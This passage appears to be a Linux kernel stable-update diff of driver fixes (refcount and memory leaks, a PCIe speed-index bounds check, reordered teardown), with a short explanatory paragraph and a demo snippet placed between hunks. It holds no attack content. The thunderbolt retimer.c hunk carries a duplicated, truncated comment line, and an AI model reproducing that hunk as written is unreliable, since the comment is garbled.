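#define DEMO_FIELD_B	GENMASK(13, 8)	/* bits 13:8 */

static u32 demo_update(u32 reg, u32 a, u32 b)
{
	/* Clear only the fields being rewritten... */
	reg &= ~(DEMO_FIELD_A | DEMO_FIELD_B);
	/* ...then place new values; FIELD_PREP shifts and masks them
	 * according to the GENMASK definition, so the shift amount can
	 * never drift out of sync with the mask. */
	reg |= FIELD_PREP(DEMO_FIELD_A, a);
	reg |= FIELD_PREP(DEMO_FIELD_B, b);

	return reg;
}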
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index 8979dd05e873f..d4ec46d1c8cfb 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -1121,12 +1121,12 @@ static void octep_remove(struct pci_dev *pdev)
+ 	if (!oct)
+ 		return;
+ 
+-	cancel_work_sync(&oct->tx_timeout_task);
+ 	cancel_work_sync(&oct->ctrl_mbox_task);
+ 	netdev = oct->netdev;
+ 	if (netdev->reg_state == NETREG_REGISTERED)
+ 		unregister_netdev(netdev);
+ 
++	cancel_work_sync(&oct->tx_timeout_task);
+ 	octep_device_cleanup(oct);
+ 	pci_release_mem_regions(pdev);
+ 	free_netdev(netdev);
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index e8d427c7d1cff..dc43e74147fbf 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -177,6 +177,15 @@ static int qede_sriov_configure(struct pci_dev *pdev, int num_vfs_param)
+ }
+ #endif
+ 
++static int __maybe_unused qede_suspend(struct device *dev)
++{
++	dev_info(dev, "Device does not support suspend operation\n");
++
++	return -EOPNOTSUPP;
++}
++
++static DEFINE_SIMPLE_DEV_PM_OPS(qede_pm_ops, qede_suspend, NULL);
++
+ static const struct pci_error_handlers qede_err_handler = {
+ 	.error_detected = qede_io_error_detected,
+ };
+@@ -191,6 +200,7 @@ static struct pci_driver qede_pci_driver = {
+ 	.sriov_configure = qede_sriov_configure,
+ #endif
+ 	.err_handler = &qede_err_handler,
++	.driver.pm = &qede_pm_ops,
+ };
+ 
+ static struct qed_eth_cb_ops qede_ll_ops = {
+diff --git a/drivers/net/ethernet/sfc/tc.c b/drivers/net/ethernet/sfc/tc.c
+index 3478860d40232..d312147cd2dd7 100644
+--- a/drivers/net/ethernet/sfc/tc.c
++++ b/drivers/net/ethernet/sfc/tc.c
+@@ -603,10 +603,10 @@ int efx_init_tc(struct efx_nic *efx)
+ 	rc = efx_tc_configure_rep_mport(efx);
+ 	if (rc)
+ 		return rc;
+-	efx->tc->up = true;
+ 	rc = flow_indr_dev_register(efx_tc_indr_setup_cb, efx);
+ 	if (rc)
+ 		return rc;
++	efx->tc->up = true;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/pcs/pcs-rzn1-miic.c b/drivers/net/pcs/pcs-rzn1-miic.c
+index c1424119e8212..847ab37f13671 100644
+--- a/drivers/net/pcs/pcs-rzn1-miic.c
++++ b/drivers/net/pcs/pcs-rzn1-miic.c
+@@ -317,15 +317,21 @@ struct phylink_pcs *miic_create(struct device *dev, struct device_node *np)
+ 
+ 	pdev = of_find_device_by_node(pcs_np);
+ 	of_node_put(pcs_np);
+-	if (!pdev || !platform_get_drvdata(pdev))
++	if (!pdev || !platform_get_drvdata(pdev)) {
++		if (pdev)
++			put_device(&pdev->dev);
+ 		return ERR_PTR(-EPROBE_DEFER);
++	}
+ 
+ 	miic_port = kzalloc(sizeof(*miic_port), GFP_KERNEL);
+-	if (!miic_port)
++	if (!miic_port) {
++		put_device(&pdev->dev);
+ 		return ERR_PTR(-ENOMEM);
++	}
+ 
+ 	miic = platform_get_drvdata(pdev);
+ 	device_link_add(dev, miic->dev, DL_FLAG_AUTOREMOVE_CONSUMER);
++	put_device(&pdev->dev);
+ 
+ 	miic_port->miic = miic;
+ 	miic_port->port = port - 1;
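
of_find_device_by_node() returns the platform device with its refcount raised, and each of the three exit paths above now balances it: the lookup-failure path, the allocation-failure path, and the success path, where the device link (not the refcount) keeps the provider alive. The balanced lookup, as a sketch with a hypothetical consumer:

#include <linux/err.h>
#include <linux/of_platform.h>
#include <linux/platform_device.h>

static void *lookup_provider_data(struct device_node *np)
{
	struct platform_device *pdev;
	void *data;

	pdev = of_find_device_by_node(np);	/* takes a reference */
	if (!pdev)
		return ERR_PTR(-EPROBE_DEFER);

	data = platform_get_drvdata(pdev);
	put_device(&pdev->dev);			/* always drop it */

	/* No drvdata yet means the provider has not finished probing. */
	return data ?: ERR_PTR(-EPROBE_DEFER);
}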
+diff --git a/drivers/net/phy/at803x.c b/drivers/net/phy/at803x.c
+index 61824a463df85..edd4b1e58d965 100644
+--- a/drivers/net/phy/at803x.c
++++ b/drivers/net/phy/at803x.c
+@@ -305,7 +305,6 @@ struct at803x_priv {
+ 	bool is_1000basex;
+ 	struct regulator_dev *vddio_rdev;
+ 	struct regulator_dev *vddh_rdev;
+-	struct regulator *vddio;
+ 	u64 stats[ARRAY_SIZE(at803x_hw_stats)];
+ };
+ 
+@@ -461,21 +460,27 @@ static int at803x_set_wol(struct phy_device *phydev,
+ 			phy_write_mmd(phydev, MDIO_MMD_PCS, offsets[i],
+ 				      mac[(i * 2) + 1] | (mac[(i * 2)] << 8));
+ 
+-		/* Enable WOL function */
+-		ret = phy_modify_mmd(phydev, MDIO_MMD_PCS, AT803X_PHY_MMD3_WOL_CTRL,
+-				0, AT803X_WOL_EN);
+-		if (ret)
+-			return ret;
++		/* Enable WOL function for 1588 */
++		if (phydev->drv->phy_id == ATH8031_PHY_ID) {
++			ret = phy_modify_mmd(phydev, MDIO_MMD_PCS,
++					     AT803X_PHY_MMD3_WOL_CTRL,
++					     0, AT803X_WOL_EN);
++			if (ret)
++				return ret;
++		}
+ 		/* Enable WOL interrupt */
+ 		ret = phy_modify(phydev, AT803X_INTR_ENABLE, 0, AT803X_INTR_ENABLE_WOL);
+ 		if (ret)
+ 			return ret;
+ 	} else {
+-		/* Disable WoL function */
+-		ret = phy_modify_mmd(phydev, MDIO_MMD_PCS, AT803X_PHY_MMD3_WOL_CTRL,
+-				AT803X_WOL_EN, 0);
+-		if (ret)
+-			return ret;
++		/* Disable WoL function for 1588 */
++		if (phydev->drv->phy_id == ATH8031_PHY_ID) {
++			ret = phy_modify_mmd(phydev, MDIO_MMD_PCS,
++					     AT803X_PHY_MMD3_WOL_CTRL,
++					     AT803X_WOL_EN, 0);
++			if (ret)
++				return ret;
++		}
+ 		/* Disable WOL interrupt */
+ 		ret = phy_modify(phydev, AT803X_INTR_ENABLE, AT803X_INTR_ENABLE_WOL, 0);
+ 		if (ret)
+@@ -510,11 +515,11 @@ static void at803x_get_wol(struct phy_device *phydev,
+ 	wol->supported = WAKE_MAGIC;
+ 	wol->wolopts = 0;
+ 
+-	value = phy_read_mmd(phydev, MDIO_MMD_PCS, AT803X_PHY_MMD3_WOL_CTRL);
++	value = phy_read(phydev, AT803X_INTR_ENABLE);
+ 	if (value < 0)
+ 		return;
+ 
+-	if (value & AT803X_WOL_EN)
++	if (value & AT803X_INTR_ENABLE_WOL)
+ 		wol->wolopts |= WAKE_MAGIC;
+ }
+ 
+@@ -825,11 +830,11 @@ static int at803x_parse_dt(struct phy_device *phydev)
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		priv->vddio = devm_regulator_get_optional(&phydev->mdio.dev,
+-							  "vddio");
+-		if (IS_ERR(priv->vddio)) {
++		ret = devm_regulator_get_enable_optional(&phydev->mdio.dev,
++							 "vddio");
++		if (ret) {
+ 			phydev_err(phydev, "failed to get VDDIO regulator\n");
+-			return PTR_ERR(priv->vddio);
++			return ret;
+ 		}
+ 
+ 		/* Only AR8031/8033 support 1000Base-X for SFP modules */
+@@ -857,23 +862,12 @@ static int at803x_probe(struct phy_device *phydev)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (priv->vddio) {
+-		ret = regulator_enable(priv->vddio);
+-		if (ret < 0)
+-			return ret;
+-	}
+-
+ 	if (phydev->drv->phy_id == ATH8031_PHY_ID) {
+ 		int ccr = phy_read(phydev, AT803X_REG_CHIP_CONFIG);
+ 		int mode_cfg;
+-		struct ethtool_wolinfo wol = {
+-			.wolopts = 0,
+-		};
+ 
+-		if (ccr < 0) {
+-			ret = ccr;
+-			goto err;
+-		}
++		if (ccr < 0)
++			return ccr;
+ 		mode_cfg = ccr & AT803X_MODE_CFG_MASK;
+ 
+ 		switch (mode_cfg) {
+@@ -887,29 +881,17 @@ static int at803x_probe(struct phy_device *phydev)
+ 			break;
+ 		}
+ 
+-		/* Disable WOL by default */
+-		ret = at803x_set_wol(phydev, &wol);
+-		if (ret < 0) {
+-			phydev_err(phydev, "failed to disable WOL on probe: %d\n", ret);
+-			goto err;
+-		}
++		/* Disable WoL in the 1588 register, which is enabled
++		 * by default.
++		 */
++		ret = phy_modify_mmd(phydev, MDIO_MMD_PCS,
++				     AT803X_PHY_MMD3_WOL_CTRL,
++				     AT803X_WOL_EN, 0);
++		if (ret)
++			return ret;
+ 	}
+ 
+ 	return 0;
+-
+-err:
+-	if (priv->vddio)
+-		regulator_disable(priv->vddio);
+-
+-	return ret;
+-}
+-
+-static void at803x_remove(struct phy_device *phydev)
+-{
+-	struct at803x_priv *priv = phydev->priv;
+-
+-	if (priv->vddio)
+-		regulator_disable(priv->vddio);
+ }
+ 
+ static int at803x_get_features(struct phy_device *phydev)
+@@ -2022,7 +2004,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm Atheros AR8035",
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_aneg		= at803x_config_aneg,
+ 	.config_init		= at803x_config_init,
+ 	.soft_reset		= genphy_soft_reset,
+@@ -2044,7 +2025,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm Atheros AR8030",
+ 	.phy_id_mask		= AT8030_PHY_ID_MASK,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_init		= at803x_config_init,
+ 	.link_change_notify	= at803x_link_change_notify,
+ 	.set_wol		= at803x_set_wol,
+@@ -2060,7 +2040,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm Atheros AR8031/AR8033",
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_init		= at803x_config_init,
+ 	.config_aneg		= at803x_config_aneg,
+ 	.soft_reset		= genphy_soft_reset,
+@@ -2083,7 +2062,6 @@ static struct phy_driver at803x_driver[] = {
+ 	PHY_ID_MATCH_EXACT(ATH8032_PHY_ID),
+ 	.name			= "Qualcomm Atheros AR8032",
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.config_init		= at803x_config_init,
+ 	.link_change_notify	= at803x_link_change_notify,
+@@ -2099,7 +2077,6 @@ static struct phy_driver at803x_driver[] = {
+ 	PHY_ID_MATCH_EXACT(ATH9331_PHY_ID),
+ 	.name			= "Qualcomm Atheros AR9331 built-in PHY",
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.suspend		= at803x_suspend,
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+@@ -2116,7 +2093,6 @@ static struct phy_driver at803x_driver[] = {
+ 	PHY_ID_MATCH_EXACT(QCA9561_PHY_ID),
+ 	.name			= "Qualcomm Atheros QCA9561 built-in PHY",
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.suspend		= at803x_suspend,
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+@@ -2182,7 +2158,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.name			= "Qualcomm QCA8081",
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.probe			= at803x_probe,
+-	.remove			= at803x_remove,
+ 	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.get_tunable		= at803x_get_tunable,
+diff --git a/drivers/net/phy/broadcom.c b/drivers/net/phy/broadcom.c
+index ad71c88c87e78..f9ad8902100f3 100644
+--- a/drivers/net/phy/broadcom.c
++++ b/drivers/net/phy/broadcom.c
+@@ -486,6 +486,17 @@ static int bcm54xx_resume(struct phy_device *phydev)
+ 	return bcm54xx_config_init(phydev);
+ }
+ 
++static int bcm54810_read_mmd(struct phy_device *phydev, int devnum, u16 regnum)
++{
++	return -EOPNOTSUPP;
++}
++
++static int bcm54810_write_mmd(struct phy_device *phydev, int devnum, u16 regnum,
++			      u16 val)
++{
++	return -EOPNOTSUPP;
++}
++
+ static int bcm54811_config_init(struct phy_device *phydev)
+ {
+ 	int err, reg;
+@@ -981,6 +992,8 @@ static struct phy_driver broadcom_drivers[] = {
+ 	.get_strings	= bcm_phy_get_strings,
+ 	.get_stats	= bcm54xx_get_stats,
+ 	.probe		= bcm54xx_phy_probe,
++	.read_mmd	= bcm54810_read_mmd,
++	.write_mmd	= bcm54810_write_mmd,
+ 	.config_init    = bcm54xx_config_init,
+ 	.config_aneg    = bcm5481_config_aneg,
+ 	.config_intr    = bcm_phy_config_intr,
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 82f74f96eba29..944f76e6fc8eb 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3050,6 +3050,8 @@ static int phy_probe(struct device *dev)
+ 			goto out;
+ 	}
+ 
++	phy_disable_interrupts(phydev);
++
+ 	/* Start out supporting everything. Eventually,
+ 	 * a controller will attach, and may modify one
+ 	 * or both of these values
+@@ -3137,16 +3139,6 @@ static int phy_remove(struct device *dev)
+ 	return 0;
+ }
+ 
+-static void phy_shutdown(struct device *dev)
+-{
+-	struct phy_device *phydev = to_phy_device(dev);
+-
+-	if (phydev->state == PHY_READY || !phydev->attached_dev)
+-		return;
+-
+-	phy_disable_interrupts(phydev);
+-}
+-
+ /**
+  * phy_driver_register - register a phy_driver with the PHY layer
+  * @new_driver: new phy_driver to register
+@@ -3180,7 +3172,6 @@ int phy_driver_register(struct phy_driver *new_driver, struct module *owner)
+ 	new_driver->mdiodrv.driver.bus = &mdio_bus_type;
+ 	new_driver->mdiodrv.driver.probe = phy_probe;
+ 	new_driver->mdiodrv.driver.remove = phy_remove;
+-	new_driver->mdiodrv.driver.shutdown = phy_shutdown;
+ 	new_driver->mdiodrv.driver.owner = owner;
+ 	new_driver->mdiodrv.driver.probe_type = PROBE_FORCE_SYNCHRONOUS;
+ 
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 509ba706781ed..921ca59822b0f 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -2200,7 +2200,9 @@ static void team_setup(struct net_device *dev)
+ 
+ 	dev->hw_features = TEAM_VLAN_FEATURES |
+ 			   NETIF_F_HW_VLAN_CTAG_RX |
+-			   NETIF_F_HW_VLAN_CTAG_FILTER;
++			   NETIF_F_HW_VLAN_CTAG_FILTER |
++			   NETIF_F_HW_VLAN_STAG_RX |
++			   NETIF_F_HW_VLAN_STAG_FILTER;
+ 
+ 	dev->hw_features |= NETIF_F_GSO_ENCAP_ALL;
+ 	dev->features |= dev->hw_features;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 075d5d42f5eb6..21d3461fb5d1c 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -2504,7 +2504,7 @@ static void virtnet_init_default_rss(struct virtnet_info *vi)
+ 		vi->ctrl->rss.indirection_table[i] = indir_val;
+ 	}
+ 
+-	vi->ctrl->rss.max_tx_vq = vi->curr_queue_pairs;
++	vi->ctrl->rss.max_tx_vq = vi->has_rss ? vi->curr_queue_pairs : 0;
+ 	vi->ctrl->rss.hash_key_length = vi->rss_key_size;
+ 
+ 	netdev_rss_key_fill(vi->ctrl->rss.key, vi->rss_key_size);
+@@ -3825,6 +3825,8 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 		eth_hw_addr_set(dev, addr);
+ 	} else {
+ 		eth_hw_addr_random(dev);
++		dev_info(&vdev->dev, "Assigned random MAC address %pM\n",
++			 dev->dev_addr);
+ 	}
+ 
+ 	/* Set up our device-specific information */
+@@ -3940,8 +3942,6 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 	if (vi->has_rss || vi->has_rss_hash_report)
+ 		virtnet_init_default_rss(vi);
+ 
+-	_virtnet_set_queues(vi, vi->curr_queue_pairs);
+-
+ 	/* serialize netdev register + virtio_device_ready() with ndo_open() */
+ 	rtnl_lock();
+ 
+@@ -3954,6 +3954,26 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 
+ 	virtio_device_ready(vdev);
+ 
++	_virtnet_set_queues(vi, vi->curr_queue_pairs);
++
++	/* A random MAC address has been assigned; notify the device.
++	 * We don't fail probe if VIRTIO_NET_F_CTRL_MAC_ADDR is not there
++	 * because many devices work fine without getting the MAC explicitly
++	 */
++	if (!virtio_has_feature(vdev, VIRTIO_NET_F_MAC) &&
++	    virtio_has_feature(vi->vdev, VIRTIO_NET_F_CTRL_MAC_ADDR)) {
++		struct scatterlist sg;
++
++		sg_init_one(&sg, dev->dev_addr, dev->addr_len);
++		if (!virtnet_send_command(vi, VIRTIO_NET_CTRL_MAC,
++					  VIRTIO_NET_CTRL_MAC_ADDR_SET, &sg)) {
++			pr_debug("virtio_net: setting MAC address failed\n");
++			rtnl_unlock();
++			err = -EINVAL;
++			goto free_unregister_netdev;
++		}
++	}
++
+ 	rtnl_unlock();
+ 
+ 	err = virtnet_cpu_notif_add(vi);
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 1b6b437823d22..528e73ccfa43e 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -224,6 +224,7 @@
+ #define EP_STATE_ENABLED	1
+ 
+ static const unsigned int pcie_gen_freq[] = {
++	GEN1_CORE_CLK_FREQ,	/* PCI_EXP_LNKSTA_CLS == 0; undefined */
+ 	GEN1_CORE_CLK_FREQ,
+ 	GEN2_CORE_CLK_FREQ,
+ 	GEN3_CORE_CLK_FREQ,
+@@ -455,7 +456,11 @@ static irqreturn_t tegra_pcie_ep_irq_thread(int irq, void *arg)
+ 
+ 	speed = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKSTA) &
+ 		PCI_EXP_LNKSTA_CLS;
+-	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed - 1]);
++
++	if (speed >= ARRAY_SIZE(pcie_gen_freq))
++		speed = 0;
++
++	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed]);
+ 
+ 	if (pcie->of_data->has_ltr_req_fix)
+ 		return IRQ_HANDLED;
+@@ -1016,7 +1021,11 @@ retry_link:
+ 
+ 	speed = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKSTA) &
+ 		PCI_EXP_LNKSTA_CLS;
+-	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed - 1]);
++
++	if (speed >= ARRAY_SIZE(pcie_gen_freq))
++		speed = 0;
++
++	clk_set_rate(pcie->core_clk, pcie_gen_freq[speed]);
+ 
+ 	tegra_pcie_enable_interrupts(pp);
+ 
+diff --git a/drivers/pcmcia/rsrc_nonstatic.c b/drivers/pcmcia/rsrc_nonstatic.c
+index ad1141fddb4cc..8bda75990bce5 100644
+--- a/drivers/pcmcia/rsrc_nonstatic.c
++++ b/drivers/pcmcia/rsrc_nonstatic.c
+@@ -1053,6 +1053,8 @@ static void nonstatic_release_resource_db(struct pcmcia_socket *s)
+ 		q = p->next;
+ 		kfree(p);
+ 	}
++
++	kfree(data);
+ }
+ 
+ 
+diff --git a/drivers/soc/aspeed/aspeed-socinfo.c b/drivers/soc/aspeed/aspeed-socinfo.c
+index 1ca140356a084..3f759121dc00a 100644
+--- a/drivers/soc/aspeed/aspeed-socinfo.c
++++ b/drivers/soc/aspeed/aspeed-socinfo.c
+@@ -137,6 +137,7 @@ static int __init aspeed_socinfo_init(void)
+ 
+ 	soc_dev = soc_device_register(attrs);
+ 	if (IS_ERR(soc_dev)) {
++		kfree(attrs->machine);
+ 		kfree(attrs->soc_id);
+ 		kfree(attrs->serial_number);
+ 		kfree(attrs);
+diff --git a/drivers/soc/aspeed/aspeed-uart-routing.c b/drivers/soc/aspeed/aspeed-uart-routing.c
+index ef8b24fd18518..59123e1f27acb 100644
+--- a/drivers/soc/aspeed/aspeed-uart-routing.c
++++ b/drivers/soc/aspeed/aspeed-uart-routing.c
+@@ -524,7 +524,7 @@ static ssize_t aspeed_uart_routing_store(struct device *dev,
+ 	struct aspeed_uart_routing_selector *sel = to_routing_selector(attr);
+ 	int val;
+ 
+-	val = match_string(sel->options, -1, buf);
++	val = __sysfs_match_string(sel->options, -1, buf);
+ 	if (val < 0) {
+ 		dev_err(dev, "invalid value \"%s\"\n", buf);
+ 		return -EINVAL;
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 4a6a3802d7e51..288aaa05d0071 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -1479,6 +1479,8 @@ static struct pci_device_id nhi_ids[] = {
+ 	  .driver_data = (kernel_ulong_t)&icl_nhi_ops },
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTL_P_NHI1),
+ 	  .driver_data = (kernel_ulong_t)&icl_nhi_ops },
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI) },
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI) },
+ 
+ 	/* Any USB4 compliant host */
+ 	{ PCI_DEVICE_CLASS(PCI_CLASS_SERIAL_USB_USB4, ~0) },
+diff --git a/drivers/thunderbolt/nhi.h b/drivers/thunderbolt/nhi.h
+index b0718020c6f59..0f029ce758825 100644
+--- a/drivers/thunderbolt/nhi.h
++++ b/drivers/thunderbolt/nhi.h
+@@ -75,6 +75,10 @@ extern const struct tb_nhi_ops icl_nhi_ops;
+ #define PCI_DEVICE_ID_INTEL_TITAN_RIDGE_DD_BRIDGE	0x15ef
+ #define PCI_DEVICE_ID_INTEL_ADL_NHI0			0x463e
+ #define PCI_DEVICE_ID_INTEL_ADL_NHI1			0x466d
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI	0x5781
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI	0x5784
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_80G_BRIDGE 0x5786
++#define PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_40G_BRIDGE 0x57a4
+ #define PCI_DEVICE_ID_INTEL_MTL_M_NHI0			0x7eb2
+ #define PCI_DEVICE_ID_INTEL_MTL_P_NHI0			0x7ec2
+ #define PCI_DEVICE_ID_INTEL_MTL_P_NHI1			0x7ec3
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 1157b8869bcca..8c2ee431fcde8 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -74,6 +74,14 @@ static const struct tb_quirk tb_quirks[] = {
+ 		  quirk_usb3_maximum_bandwidth },
+ 	{ 0x8087, PCI_DEVICE_ID_INTEL_MTL_P_NHI1, 0x0000, 0x0000,
+ 		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_80G_NHI, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HOST_40G_NHI, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_80G_BRIDGE, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
++	{ 0x8087, PCI_DEVICE_ID_INTEL_BARLOW_RIDGE_HUB_40G_BRIDGE, 0x0000, 0x0000,
++		  quirk_usb3_maximum_bandwidth },
+ 	/*
+ 	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
+ 	 */
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 9cc28197dbc45..edbd92435b41a 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -187,6 +187,21 @@ static ssize_t nvm_authenticate_show(struct device *dev,
+ 	return ret;
+ }
+ 
++static void tb_retimer_nvm_authenticate_status(struct tb_port *port, u32 *status)
++{
++	int i;
++
++	tb_port_dbg(port, "reading NVM authentication status of retimers\n");
++
++	/*
++	 * Before doing anything else, read the authentication status.
++	 * If the retimer has it set, store it for the new retimer
++	 * device instance.
++	 */
++	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
++		usb4_port_retimer_nvm_authenticate_status(port, i, &status[i]);
++}
++
+ static void tb_retimer_set_inbound_sbtx(struct tb_port *port)
+ {
+ 	int i;
+@@ -455,18 +470,16 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 		return ret;
+ 
+ 	/*
+-	 * Enable sideband channel for each retimer. We can do this
+-	 * regardless whether there is device connected or not.
++	 * Immediately after sending enumerate retimers read the
++	 * Immediately after sending enumerate retimers, read the
+ 	 */
+-	tb_retimer_set_inbound_sbtx(port);
++	tb_retimer_nvm_authenticate_status(port, status);
+ 
+ 	/*
+-	 * Before doing anything else, read the authentication status.
+-	 * If the retimer has it set, store it for the new retimer
+-	 * device instance.
++	 * Enable sideband channel for each retimer. We can do this
++	 * regardless of whether there is a device connected or not.
+ 	 */
+-	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
+-		usb4_port_retimer_nvm_authenticate_status(port, i, &status[i]);
++	tb_retimer_set_inbound_sbtx(port);
+ 
+ 	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++) {
+ 		/*
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index 59a559366b614..c1fa20a4e3420 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2481,12 +2481,13 @@ static void gsm_error(struct gsm_mux *gsm)
+ static void gsm_cleanup_mux(struct gsm_mux *gsm, bool disc)
+ {
+ 	int i;
+-	struct gsm_dlci *dlci = gsm->dlci[0];
++	struct gsm_dlci *dlci;
+ 	struct gsm_msg *txq, *ntxq;
+ 
+ 	gsm->dead = true;
+ 	mutex_lock(&gsm->mutex);
+ 
++	dlci = gsm->dlci[0];
+ 	if (dlci) {
+ 		if (disc && dlci->state != DLCI_CLOSED) {
+ 			gsm_dlci_begin_close(dlci);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index acf578aa9930b..38760bd6e0c29 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -3281,6 +3281,7 @@ void serial8250_init_port(struct uart_8250_port *up)
+ 	struct uart_port *port = &up->port;
+ 
+ 	spin_lock_init(&port->lock);
++	port->pm = NULL;
+ 	port->ops = &serial8250_pops;
+ 	port->has_sysrq = IS_ENABLED(CONFIG_SERIAL_8250_CONSOLE);
+ 
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index f6d0ea2c6be4b..c5a9b89c4d313 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1125,8 +1125,8 @@ static void lpuart_copy_rx_to_tty(struct lpuart_port *sport)
+ 		unsigned long sr = lpuart32_read(&sport->port, UARTSTAT);
+ 
+ 		if (sr & (UARTSTAT_PE | UARTSTAT_FE)) {
+-			/* Read DR to clear the error flags */
+-			lpuart32_read(&sport->port, UARTDATA);
++			/* Clear the error flags */
++			lpuart32_write(&sport->port, sr, UARTSTAT);
+ 
+ 			if (sr & UARTSTAT_PE)
+ 				sport->port.icount.parity++;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 28edbaf7bb329..2a9c4058824a8 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -1753,13 +1753,10 @@ static int stm32_usart_serial_remove(struct platform_device *pdev)
+ 	struct uart_port *port = platform_get_drvdata(pdev);
+ 	struct stm32_port *stm32_port = to_stm32_port(port);
+ 	const struct stm32_usart_offsets *ofs = &stm32_port->info->ofs;
+-	int err;
+ 	u32 cr3;
+ 
+ 	pm_runtime_get_sync(&pdev->dev);
+-	err = uart_remove_one_port(&stm32_usart_driver, port);
+-	if (err)
+-		return(err);
++	uart_remove_one_port(&stm32_usart_driver, port);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_set_suspended(&pdev->dev);
+diff --git a/drivers/usb/chipidea/ci_hdrc_imx.c b/drivers/usb/chipidea/ci_hdrc_imx.c
+index 9ffcecd3058c1..60b4de0a4f76d 100644
+--- a/drivers/usb/chipidea/ci_hdrc_imx.c
